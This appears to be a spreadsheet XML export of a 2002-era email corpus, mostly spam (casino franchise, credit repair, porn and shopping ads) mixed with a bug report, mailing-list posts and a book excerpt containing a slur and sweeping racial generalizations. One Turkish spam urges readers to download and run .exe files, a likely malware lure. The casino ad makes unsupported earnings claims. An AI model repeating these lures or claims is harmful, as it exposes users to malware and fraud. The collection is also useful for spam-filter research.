 &lt;P align=center&gt;&lt;FONT color=#0000ff&gt;&lt;A href="http://www.marysstore.com"&gt;CLICK HERE&lt;/A&gt; &lt;A href="http://www.marysstore.com"&gt;TO ENTER &lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;A href="http://www.marysstore.com"&gt;&lt;FONT color=#0000ff&gt;MARY'S STORE&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;SMALL&gt;&lt;SMALL&gt;If you do not wish to receive further discounts please &lt;A href="mailto:removeme@marysstore.com"&gt;click here&lt;/A&gt; and type remove in the subject line.&lt;/SMALL&gt;&lt;/SMALL&gt;&lt;/P&gt;
 ------=_NextPart_OOMLWVMESG--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HIZLI &amp; SINIRSIZ sex 
</t>
  </si>
  <si>
    <t xml:space="preserve">4 kat Daha Hizli &amp; Sinirsiz  baglantiya ne dersiniz???
 18.451 adet mpeg video , 248.105 adet resim ar=FEivimize, 48 Canl=FD sohb=
 et odas=FDna sadece http://pembeliste.netfirms.com/videolar.exe  programi=
 ni calistirarak ulasabilirsiniz.
 Ayr=FDca Hande ATAIZI nin 11.4dk Porno v=FDdeosuna http://pembeliste.netf=
 irms.com/hande_ataizi.exe programiyla ulasabilir ve download edebilirsini=
 z.
 http://pembeliste.netfirms.com/videolar.exe
 -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</si>
  <si>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Gain Major Cash
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 OWN YOUR VERY OWN FREE CASINO AND SPORTSBOOK!             
 EARNING POTENTIAL: $75-$150,000 + YEARLY  P/T!! 
 Toll Free: 1-866-522-8575 24hrs. International calls: 1-954-610-9386 
 Ted Koppel, Nightline...
 "Not only is Internet Gambling already possible, already a modestly thrivi=
 ng Industry, it promises to become huge" 
 We create your very own Online Casino and Sportsbook Absolutely FREE!!
 You Receive the Highest Payouts! 25-50%, With Lifetime Residuals!     
 Our marketing tools assist you in easily generating revenue .
 100 people losing just $500 a month in your casino gives you $25,000 a mon=
 th!!!
 *If you are one of the first 25 people to call today, Receive a FREE marke=
 ting package!                       
 *Available in a limited number of area codes throughout the USA.
 *AVAILABLE ON A FIRST COME FIRST SERVE BASIS IN  YOUR AREA.   
 Toll Free 1-866-522-8575 24hrs. International calls: 954-610-9386 or email=
  your name and phone number to: 
 mailto:respond_to_dave@excite.com?subject=3DMore-Info-$$$
 U.S. News and World report on Internet gambling: "A gold rush in Cyberspac=
 e." 
 PAYOUT SCHEDULE: You receive 25-50% of the monthly Net Cashout (the cumula=
 tive loss of all players). 
 1. Internet use is continuing to explode! It is estimated that a million n=
 ew people every day are joining 
 the hundreds  of  millions already on-line.   
 2. Legalized gaming has become the top revenue earner for all forms of ent=
 ertainment in the U.S. today. 
 Your Winnings $10,000 =3D You earn $5,000 $25,000 =3D You earn $12,500 $50=
 ,000 =3D You earn $25,000 
 $100,000 =3DYou earn $50,000
 NO TECHNICAL EXPERIENCE NECESSARY! WE DO ALL THE WORK! 
 Our company is strategically aligned with industry leaders and ready to la=
 unch an aggressive marketing 
 strategy. GQ Magazine "The gambling urge is universal, mixing it with the =
 ubiquity of the Internet is a 
 stroke of genius."  
 INTERNET GAMBLING: This is the estimated gross revenue for Internet gambli=
 ng operations based on 
 results of publicly traded companies and research by stock experts. 
 1997 $0.30 billion 1998 $0.65 billion 1999 $1.17 billion 2000 $2.89 billio=
 n 2001 $5.72 billion 
 2002 $9.17 billion source: Christiansen/Cummings Associates, Inc. Here's a=
 n interesting statistic: 
 A typical better loses $500 per week. Do The Math!
 Do not wait, we are poised for success, and looking for people to share in=
  that success!
 Contact us today: Toll Free 1-866-522-8575 24hrs. International calls: 954=
 -610-9386   
 Or Email your name and phone number along with the best time to reach you.=
 mailto:respond_to_dave@excite.com?subject=3DMore-Info-$$$
 Why we're "IN THE NEWS" Every gambler knows that the house always wins in =
 the long run. 
 As Steve Wynn once famously said, "the only way to make money in a casino =
 is to own one" 
 "I made $73,589.00 in my first 6 months, and will double that this time ar=
 ound" J.Barnes, Norfolk, VA 
 "We believe our projections of Internet gambling revenues of $100 to $200 =
 Billion domestically and 
 $200-$400 Billion in the rest of the world is reasonable, even conservativ=
 e." The Baker Report
 "We didn't realize how many people in our area gambled on-line until we re=
 ceived our first check for 
 $39,789.54" Steve Rhodes, PA. 
 "As an entertainer, I look at the Internet as the future venue for many fo=
 rms of entertainment. It is a 
 powerful way to bring fun and safe entertainment to millions of people at =
 the same time."  
 Country Singer and online casino owner, Kenny Rogers 
 "I was amazed at the number of friends and family that are playing on my C=
 asino, last month I earned over $11,400" 
 Dave P. IL 
 "There's no doubt you are dealing with hundreds of Billions of dollars... =
 the amount of money we're talking 
 is astronomical." -Wisconsin Attorney General James Doyle on Internet gamb=
 ling 
 "I have over 500 players a month at my casino right now and I am already s=
 tarting your 65% program" MD. WI. 
 "Net traffic is doubling every 100 days." U.S. Commerce Department 
 "On-line gambling turnovers have the potential to dwarf those of other int=
 eractive services, tapping into an existing 
 traditional gambling market valued at over $700 Billion in Europe alone." =
 Data monitor, a market analyst corporation.
 PC Computing Magazine has conservatively estimated that the US Internet ga=
 ming market could soon reach $20 billion 
 in annual revenue. 
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D
 REMOVAL INSRTUCTIONS: CLICK HERE mailto:loan75@uol.com.co?subject=3DRemove=
 -CAS
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EASY CREDIT REPAIR SOFTWARE IS HERE!!!             11294
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Got Bad Credit???
 FIX IT!!!
 YES! Fix your OWN credit report with our easy to use software.
 No Attorney Fees!
 Simply download your way to good credit.
 Get rid of negatives on your credit report easily!
 NuCredit is available in two versions:
 NuCredit for individual use is ONLY $49.95 OR
 Credit Pro for use with up to 10 people for ONLY $99.00
 Follow the link below and start repairing your credit TODAY!!
 &lt;http://211.152.134.203/~inbox013&gt;
 If you wish to be removed from our mailing list please click the link below and indicate the address at which you received this original email at so we can properly remove it from our list.
 &lt;mailto:NuCredit4@yahoo.com?subject=REMOVE&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New exam fury puts Morris's job in danger
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357894,215/
 Date: 2002-09-29T00:40:00+01:00
 *UK latest:* Sacked regulator accuses her of 'unbearable pressure'.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] ....It is not my fault. .- vwiid
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Hi i'm Rita !!!&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgcolor="#FF00FF" link="#800000" vlink="#800000" alink="#800000" text="#FF0000"&gt;&lt;LEFT&gt;
 &lt;TABLE width=427 height="60"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=center bgcolor="#FF00FF" width="419" height="56"&gt;&lt;b&gt;&lt;a href="http://www.amsterdamcash.com/click.cfm?siteid=0017&amp;amp;companyid=33043"&gt;&lt;font color="#800000"&gt;&lt;span style="background-color: #FFFFFF"&gt;&lt;font face="Times New Roman" size="7"&gt;&lt;i&gt;R&lt;/i&gt;&lt;/font&gt;&lt;/span&gt;&lt;font face="verdana" size="6"&gt;&lt;span style="background-color: #00FFFF"&gt;E&lt;/span&gt;&lt;span style="background-color: #FFFF00"&gt;A&lt;/span&gt;&lt;/font&gt;&lt;font face="Times New Roman" size="6"&gt;&lt;span style="background-color: #00FF00"&gt;D&lt;/span&gt;&lt;/font&gt;&lt;font face="verdana" size="6"&gt;
       &lt;/font&gt;&lt;span style="background-color: #FFFFFF"&gt;&lt;font face="Tahoma" size="7"&gt;&lt;i&gt;M&lt;/i&gt;&lt;/font&gt;&lt;/span&gt;&lt;font face="Lucida Console" size="6"&gt;&lt;span style="background-color: #00FF00"&gt;Y&lt;/span&gt;&lt;/font&gt;&lt;font face="verdana" size="6"&gt;
       &lt;/font&gt;&lt;span style="background-color: #FFFF00"&gt;&lt;font face="Comic Sans MS" size="7"&gt;&lt;i&gt;L&lt;/i&gt;&lt;/font&gt;&lt;/span&gt;&lt;font face="verdana" size="6"&gt;&lt;span style="background-color: #00FFFF"&gt;I&lt;/span&gt;&lt;/font&gt;&lt;font face="Georgia" size="6"&gt;&lt;span style="background-color: #00FF00"&gt;P&lt;/span&gt;&lt;/font&gt;&lt;font face="Tahoma" size="6"&gt;&lt;span style="background-color: #FFFF00"&gt;S&lt;/span&gt;&lt;/font&gt;&lt;font face="verdana" size="5"&gt;&lt;span style="background-color: #FFFFFF"&gt;tick&lt;/span&gt;&lt;span style="background-color: #FF00FF"&gt;
       &lt;/span&gt; &lt;/font&gt;&lt;span style="background-color: #00FFFF"&gt;&lt;font face="verdana" size="6"&gt;!&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
       &lt;p&gt;&lt;a href="http://www.amsterdamcash.com/click.cfm?siteid=0017&amp;amp;companyid=33043" target="_blank"&gt;&lt;img alt="Nobody knows, I love to smoke...." src="http://privategirlfriend.5u.com/images_123/big.jpg" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
     &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE width=428&gt;
   &lt;TR&gt;
     &lt;TD align=left bgcolor="#FF00FF" width="420"&gt;
       &lt;p align="center"&gt;&lt;b&gt;&lt;a href="http://www.amsterdamcash.com/click.cfm?siteid=0017&amp;amp;companyid=33043"&gt;&lt;font face="Tahoma" color="#000080" size="7"&gt;&lt;span style="background-color: #00FF00"&gt;L&lt;/span&gt;&lt;/font&gt;&lt;font color="#000080" size="6"&gt;&lt;font face="Comic Sans MS"&gt;&lt;span style="background-color: #FFFFFF"&gt;I&lt;/span&gt;&lt;span style="background-color: #00FFFF"&gt;V&lt;/span&gt;&lt;/font&gt;&lt;font face="Times New Roman"&gt;&lt;span style="background-color: #FFFF00"&gt;E&lt;/span&gt;&lt;span style="background-color: #FF00FF"&gt;
       &lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face="Microsoft Sans Serif" color="#000080" size="7"&gt;&lt;span style="background-color: #C0C0C0"&gt;F&lt;/span&gt;&lt;/font&gt;&lt;span style="background-color: #FF0000"&gt;&lt;font color="#000080" size="6" face="Microsoft Sans Serif"&gt;rom&lt;/font&gt;&lt;/span&gt;&lt;font color="#000080" size="6" face="Microsoft Sans Serif"&gt;&lt;span style="background-color: #FF00FF"&gt;
       &lt;/span&gt;&lt;/font&gt;&lt;span style="background-color: #FFFFFF"&gt;&lt;font color="#000080" face="Microsoft Sans Serif" size="7"&gt;A&lt;/font&gt;&lt;/span&gt;&lt;font color="#000080" size="6" face="Microsoft Sans Serif"&gt;&lt;span style="background-color: #FFFFFF"&gt;ms&lt;/span&gt;&lt;span style="background-color: #00FF00"&gt;ter&lt;/span&gt;&lt;span style="background-color: #FFFF00"&gt;dam&lt;/span&gt;&lt;span style="background-color: #FF00FF"&gt;
       &lt;/span&gt;&lt;/font&gt;&lt;font color="#000080" size="7" face="Lucida Console"&gt;&lt;span style="background-color: #00FFFF"&gt;!&lt;/span&gt;&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT 
 face=Verdana color=#808080 size=1&gt;This mail is NEVER sent unsolicited, Got it by 
 error ?&lt;BR&gt;[ &lt;A href="http://www.redlightemail.com/remove.cfm?email=&lt;email&gt;" 
 target=_blank&gt;&lt;FONT color=#808080&gt;CLICK HERE&lt;/FONT&gt;&lt;/A&gt; ] to be removed from our 
 subscribers List !&lt;/FONT&gt; 
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/p&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 fuclcxlequtkbfuoeseysgfu
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Excerpt;  Baby Makers, Loser Choosers, &amp; Welfare Abusers...Images of My America!
</t>
  </si>
  <si>
    <t xml:space="preserve">
                          Foreword
 After thirty?three years of being a black man living in "Ghetto America," an environment notorious for danger, crime, and poverty, I have made startling discoveries involving young African?American men and women who comprise what I have come to define as the "Black Generation X". I have become aware that there is no formal distinction separating young African?Americans from the general definition of "Generation X". Aside from it being regarded as the generation that followed "Baby Boomers", it's important to point out there is no root definition for this term as well. Since the theme of this work is centered on identifying the realities and misconceptions of young African?American culture, I have chosen a definition that incorporates all of the components that were part of my birth, childhood, and young adult life. Taken from a web site entitled "Generation X", created and maintained by the Colorado College, the definition is as follows: 
  "We are a group of people born between 1961 and 1981. We are individuals who live for the 'here and now', like to experiment, and who require immediate results. We are typically selfish, and cynical, and depend a lot on our parents. We question authority, and feel like we carry the burden of the previous generations. It's that simple. It seems we have come to be called "Xer's" simply because we represent something negative to our elders. We may be the one thing all of the generations that precede us have in common, that is the ability to speak assuredly about our shortcomings. Of course, they overlook the fact that we are their responsibility, or actually their fault. Our generation will be called upon to look after our parents knowing they failed to look after us. Intergenerational justice failed somewhere along the way and it will be our task to either rectify it or make it worse."
 "We are a group of individuals who grew up with no one at home after school. It appears we have little hope for the future. No jobs, no homes, and basically no money are almost expected of us. These bleak prospects, along with the fact that we will be forced to support the largest amount of senior citizens ever, do not provide much hope. Some believe that these blockades will be too much for us to handle and we will for the most part fail at life, but many see our individualism and resourcefulness that has been built up through our childhood, as our saviors. We will soon discover who is right and who is wrong." 
 This definition is important because it demonstrates the widely held belief that Generation X is comprised of one core group of American citizens. It over generalizes the similarities it expresses, and applies them to all those who were born within the corresponding years. When in fact these "similarities" speak primarily to only "white" issues and concerns. For instance, "they" say "we" depend a lot on our parents, but in ghetto America "we" could only depend on one our mothers! "They" also say, " . . .we feel like we carry the burden of previous generations," and " . . . we will be forced to support the largest amount of senior citizens ever." In ghetto America, no one ever gives these issues any thought because survival is in the here and now, and is all "we" have time for. 
 I have known for many years that the differences that separate Generation Xer's black and white occupants would eventually be identified. I never knew I would be the one doing it. Extracting the "Black" from "Generation X" and categorizing it for its own sake is a necessary and important contingency. Without doing so, the social ills that plague Ghetto America would be lost within the generalities that are explained away as part of a collective American identity.
 There are many hidden truths that exist in black America today. "White America" charges that we spend our time collecting welfare, refusing to vote, reading elementary styled books, watching music videos, day dreaming of becoming rappers, basketball players, selling drugs, and making babies. Much of this is supported in Marlon Riggs's documentary entitled "Ethnic Notions." When African Americans are mentioned, whites typically envision an image that is strikingly similar to the one that graces the cover of this book. A reality that I confirmed while watching "Roger &amp; Me," another documentary written, and directed by Michael Moore. Sadly, many of us have begun to validate this skewed image, while others bend over backwards in an attempt to pretend we do nothing of the kind, only to be contradicted and embarrassed when presented with the daily programming line up for B.E.T. (Black Entertainment Television). Many of us fail to realize, that whatever embarrassment or shame the ex
  posed truth may reveal, should be taken as an opportunity to improve, empower, enlighten, and ultimately change anyone who is guilty of perpetrating this kind of behavior.
 Regarding Black Women: I have known many in my life and although each has had unique attitudes and personalities, I began to notice the majority of them shared the same collective mentality toward black men as a whole-that black men owed them something, and are required to provide and fulfill what was missing from their lives, be it emotional, physical, or economical.
  Normally that type of assertion would not warrant opposition from me, so long as a reciprocal attitude was extended. In most cases, it has not been. It's funny though, looking back, I am surprised I never paid any attention to the beliefs and attitudes that different black women subscribe to, or the various schools of thought they possessed. Many have placed strict demands and presumptions on the African?American male, some fair and some unfair. Much of what the public believes and understands about the black female's social structure is often filtered by others in the black community who believe these inaccurate and frequently positive representations will somehow change the reality that is. 
 What originally sparked my attention was an observation I stumbled upon while skimming through and reading books related to black male and female interaction. I noticed virtually all of the books I read in the genre depict an inaccurate and misleading concentration on the affluent African?American perspective. These stories and commentaries tend to suggest that all African?Americans thrive on a middle?to?upper class professional level. They relay stories of relationship problems with "Huxtable?like" bachelors and bachelorettes whose only concern is why the other has not confessed his or her love. As I read these stories I couldn't help but become irritated by the blatant omission of the prevailing majority of blue collar or "working class" African?Americans. Although there are those in the black community that can identify with the "Huxtable?like" dynamic, unfortunately, they are few and far between. 
 The majority of stories I have read seem to be geared toward fantasizing and romanticizing the oppressive state of affairs that have plagued Black America. The black authors who have written these books fear the potential backlash awaiting anyone who would dare air out our "dirty laundry". The fact is, truth should never be stifled by fear of any kind. 
 I recently had a candid conversation with some very dear female friends who stated that although they fully acknowledge the terrible state of affairs many of our women are currently drowning in, they felt that publicizing their predicament would be viewed as a form of betrayal. As our discussion intensified, I reminded them that the only way change can be effected is by increasing public awareness that change is needed, and oftentimes, not exposing the truth can be more crippling than the truth itself. 
 The purpose of my book is in essence an attempt to change the self?destructive thinking and self?imprisoning behavior that "black male and female generation X" have been subscribing to. While discussing this with my friend, she suggested I simplify my writing style so my potential black readers could better understand what I'm attempting to convey. Acknowledging the real possibility of my message being misunderstood, I suggest to those readers that if they want to fully appreciate the finer points of this narrative-to grab a dictionary. (Don't feel bad-there were several times I had to as well!)
 Regarding Black Men: An overwhelming number of us have become preoccupied with being cool, buying sports wear, driving expensive cars, wearing gold or platinum jewelry, and often without legitimate personal wealth and while living under the most deplorable conditions! I have chosen to address this rarely acknowledged side of African?American culture because I have lived it. I have seen the chaos and futility that exists on this level. It is a world of ignorance, selfishness, pre?occupation, and idiocy.
 In my world there are people who applaud a lack of education, who brag about having served time in U.S. penitentiaries, the types of guns they carry, dope peddling, and chasing women. They champion the notion of having children without any regard to the poor environment many of them currently inhabit. In this world, wearing expensive clothes and carrying fancy handbags is mandatory even if it means spending their last dollar in order to look like they've got a million. It's a world where children dress in over?priced sports wear, mimicking and idolizing whatever popular athlete or rapper is currently in the public eye. 
 Thinking, such as the belief that fancy clothes are what define one's self?worth, and the possible corruption this thinking breeds, seems to not be an important concern for black mothers. It may come as a shock to know that most African?Americans feel that those who don't have the same, if not better, material possessions, are lesser beings, referring to them as being corny, lame, or broke. Even our "male rapper" entertainers promote backward priorities-nothing else matters as long as you look good. "The Big Tymers", a popular rap duo, have a song called "I'm Still Fly", shown in heavy rotation on B.E.T. and played regularly on black radio stations throughout the country. ("Fly" is ghetto vernacular for well dressed, also used to describe a female's beauty). Its signature verse asserts:
 "I got gator boots with a pimped out Gucci
 Suit, can't pay my rent cause all my money's
 spent, but that's O.K. cause I'm still fly."
 Worse yet, in the song "Grinding", the popular duo "Eclipse" glorifies the selling of illegal drugs in inner city neighborhoods as children play and dance throughout the entire video. (The term "grinding" is ghetto vernacular for the selling of illegal drugs) The fact that this song and video is also shown in heavy rotation on B.E.T. is further evidence that our world is in utter turmoil. Some of the key lyrics to this song are "grindingyou know what I keep in the lining" (the area in their coats where they hide illegal drugs) and
 "Patty cake Patty cake I'm the bakers man
 I bake them cakes as fast as I can
 and you can tell cause of how my bread stack up
 and I disguise it as rap so the feds backup"
 In this verse, the group refers to the process of cooking cocaine and its transformation into cocaine base or crack. When created it is compressed into the form of a large cookie with the average diameter being the size of a typical cake. (hence the term "cake" or sometimes "pie") Unfortunately for the rap genre, this song seems to strengthen the long standing argument posed by most whites that rap music is nothing more than an entertainment medium catering to violent drug offenders, who want and do nothing more than carry guns and break the law. 
 The negative references I've identified have become an integral part of the urban African?American existence. This mutated reality is ridiculous and unacceptable. This ideology should not be permitted to continue any longer than it already has. There is an overwhelming part of the African?American community that is aware of this crippling mentality. There are also many that are unaware and unfortunately, more that do not even care. Those of us who are in the know have a responsibility to educate and enlighten those of us who are not aware of the negative behavior being perpetrated daily. Whether because of habit or misguided values, this type of ideology is cyclical and thrives off of ignorance. It should be apparent to us all that we cannot wait for some other race to come and save us. We must save ourselves! I am well aware that many of you are probably furious by now, and are thinking, what right do I have to express the opinions I have thus far, as well as those I have al
  luded too. 
 I have chosen to chronicle my experiences because of the diversity and seriousness of their content. There is far too much negativity thriving within our culture. There must be acknowledgment and accountability for the truth, whether good or bad. I am aware that not all of "us" have succumbed to the crippling mentality that is rampant in our community, and I have chosen to concentrate on individuals who have had a profound impact on my life. Any similarities and generalizations I illustrate are directed solely toward individuals in the black community who share the collective negative thinking and behavior that will hereafter be identified. 
 Additionally, throughout this book I will refer to African?Americans in four different ways; the first being "African?Americans", denoting our status as citizens in the United States; secondly, as "Black", a reference that identifies and defines our differences and struggles in this country; third, as "Niggas," a term which is often misunderstood and should not be confused with "Nigger". The term "nigga" has become an accepted form of reference among young black males used to express friendship (hence the term "My Nigga") as well as a blanket reference when speaking to, of, or about other black males in a non?personal manner. I felt it necessary to make this distinction because many of the experiences I will refer to mandate the use of the term to effectively communicate the attitude and mood that existed during the time each story took place; and fourth, as "Ghetto", this term is largely intended as an internal reference commonly understood by blacks as a means to define the
   less polished members of our community.  It is important to note that the use of either term has no negative connotation and is therefore not to be associated with any feeling as such. 
 My commentary is based on real?life situations, both good and bad, and how one African?American man was affected by them. To that end, I feel it is necessary to acknowledge that my intention is not to condemn the individuals I have encountered. Despite the negativity they have displayed, I only want to make them aware that the selfish and self debasing attitudes they subscribed to, in many ways, has caused them to become their own worst enemy.
 In the case of the black female's negative and limited perspective toward black men, the world, and subconsciously themselves, I submit that this mentality is perhaps single?handedly responsible for the lack of success, happiness, and quality of life that is at the center of every African?American woman's fantasy quest. It is also important to note that the selfish and negative attitudes at the core of the tension that exists between black women and men, has been deliberately created by "White America". For example, much of the existing resentment between black women and men can be traced as far back as slavery on up to present day. Many past issues have taken on new identities and have re?emerged in the form of corporate acceptance of black women and the corporate exclusion of black men. The resulting economic independence that some black women now enjoy has caused them to challenge and judge the black man for his absence within corporate America, without realizing and ackno
  wledging that this absence is by design. 
 There are other "core" issues that have been passed down and nurtured from generation to generation, such as color barriers, light skin versus dark skin, good hair versus bad hair, loyalty, devotion, and economic status. Believe it or not, there was once a time when black women refused to date a black man if he didn't sell drugs or was not "thugged out". (a term for being rough or hoodlum-like) The reasoning behind it being that the "thug," and "drug dealer" lifestyle was synonymous with financial independence. 
 These issues, among others, relate directly to the confused mentality that exists within our internal society. Sadly that "confused mentality" is responsible for much of the neglect the African American "ghetto" community receives at the hands of our more affluent brethren. Who have locked it away in the basement, and seems to be more concerned with convincing the rest of the world that "ghetto America does not exist. Furthermore, the lack of acknowledgement of which I speak should not be confused with the impoverished masses of the African American community.  Their plight is a well-known reality, but in many cases much of ghetto America falls under that same umbrella. Be advised: this book is not a colorful or lighthearted look into "Black America".  Rather it should be viewed as a legitimate tool for identifying and changing the backward thinking that so many young African Americans (including myself) have come to perpetuate. Moreover, that "backward thinking" is the main 
  cause of our inability to strive for a common goal. An outcome that must be met; and can only be met, with Godly faith, positive strategy, cooperation, love, loyalty, self and mutual respect.
 *************************************************************
  To read More go to www.blackrealitypublishing.com
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-ports" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1049] Pathname for "triplets.txt" is incorrect.
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1049
 felicity@kluge.net changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |RESOLVED
          Resolution|                            |FIXED
 ------- Additional Comments From felicity@kluge.net  2002-10-03 13:26 -------
 Hmmm, my last message doesn't seem to have made it into bugzilla yet.
 I've committed a patch to fix this problem in both HEAD and b2_4_0.  The last
 message explains what the problem was and what the patch does to fix it.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</si>
  <si>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I never sent you this - keep it hush hush!  :)                XGAB
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BODY&gt;&lt;P align=3Dcenter&gt;&lt;FONT size=3D5&gt;&lt;STRONG&gt;&lt;FONT color=3D#3300cc =
 size=3D6&gt;&lt;A href=3D###&gt;&lt;/A&gt;Online Credit Breakthrough&lt;/FONT&gt;&lt;/STRONG&gt;&amp;nbsp=
 ;&lt;/FONT&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;FONT size=3D5&gt;&amp;nbsp;&lt;/FONT&gt;&lt;STRONG&gt;&lt;FONT co=
 lor=3D#ff0000 size=3D6&gt;Repair Your Credit Online!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;font=
  color=3D"#ffffff"&gt;9VcdkLOkGPiRWsemJM1e3KoMv2wSFOC1xKMsYFlO4owGR2cg7LpmqKU=
 BnN1wnhHi3cr5m7UEXUg&lt;/font&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D#3300cc=
  size=3D4&gt;That's right - You can now access + clear up bad credit &lt;FONT co=
 lor=3D#ff0000&gt;ONLINE &lt;/FONT&gt; -&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRON=
 G&gt;&lt;FONT color=3D#3300cc size=3D4&gt;Directly from the comfort + convienience =
 of your computer!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=
 =3D#3300cc size=3D4&gt;Watch your credit daily, with &lt;FONT color=3D#ff0000&gt;RE=
 AL TIME UPDATES&lt;/FONT&gt; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;FONT color=3D=
 #ff0000&gt;&lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;STRONG&gt;Get the information you need quickly=
  and efficently to remove negative credit items from your report!&lt;/STRONG&gt;=
 &lt;/FONT&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;A href=3Dhttp://365.pakoa.com/creditfix/?cid=
 =3D1580&amp;mid=3D17600&gt;&lt;FONT color=3D#ff0000 size=3D6&gt;Click Here For More Inf=
 ormation&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D#000000&gt;Tha=
 nk you - The Web Credit &lt;FONT size=3D1&gt;(tm) &lt;/FONT&gt;&lt;FONT size=3D3&gt;Team!&lt;/F=
 ONT&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt; &lt;font color=3D"#ffffff"&gt;9VcdkLOkGPiRWsemJM1e3KoMv=
 2wSFOC1xKMsYFlO4owGR2cg7LpmqKUBnN1wnhHi3cr5m7UEXUg&lt;/font&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 &gt; On Sun, 29 Sep 2002, Thomas Vander Stichele wrote:
 &gt; 
 &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin 
 &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin 
 &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0: 
 &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE
 &gt; Are you using the same version of GCC to compile the plugin as its C++
 &gt; dependencies?
 Yes, I am.  Everything is built inside a chroot.  I think it isn't linking 
 to a lib somewhere, I'm just not sure what lib it should preloading here.  
 Anyway to find out which one it is ?
 Thomas
  -- 
 The Dave/Dina Project : future TV today ! - http://davedina.apestaart.org/
 &lt;-*-                      -*-&gt;
 You came in just like smoke
 With a little come on come on 
 come on in your walk
 come on
 &lt;-*- thomas@apestaart.org -*-&gt;
 URGent, the best radio on the Internet - 24/7 ! - http://urgent.rug.ac.be/
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Problem with Razor 2.14 and Spamassassin 2.41
</t>
  </si>
  <si>
    <t xml:space="preserve">This is my first time running Razor, heard a lot of good things about it so
 I thought I'd give it a shot.  I also run SpamAssassin so I'd like to
 integrate the two.
 I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd
 shoot the message here first
